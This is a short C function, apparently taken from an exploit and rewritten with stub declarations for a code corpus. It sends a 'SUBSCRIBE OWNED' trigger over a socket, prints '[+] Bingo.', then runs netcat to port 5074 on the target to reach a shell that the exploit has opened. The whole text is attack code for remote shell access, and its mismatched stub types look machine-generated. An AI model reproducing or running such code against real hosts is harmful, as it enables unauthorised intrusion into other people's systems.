
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int b ;
 int execl (char*,char*,char*,char*,int *) ;
 int exit (int) ;
 int memset (int ,int,int) ;
 int perror (char*) ;
 int printf (char*,char*) ;
 int puts (char*) ;
 int send (int,int ,int ,int ) ;
 int sleep (int) ;
 int snprintf (int ,int,char*) ;
 int strlen (int ) ;

void owned(int fd, char *host){
 memset(b, 0x0, 1024);
 snprintf(b, 1023, "3 SUBSCRIBE OWNED\n");
 if(send(fd, b, strlen(b), 0) == -1){
  perror("[-] send()");
  exit(1);
 }
 puts("[+] Bingo.\n");
 sleep(1);
 execl("/bin/nc", "prout", host, "5074", ((void*)0));
 printf("[-] muh? where is nc?\n[+] A shell is waiting you on %s:5074.\n", host);
 return;
}
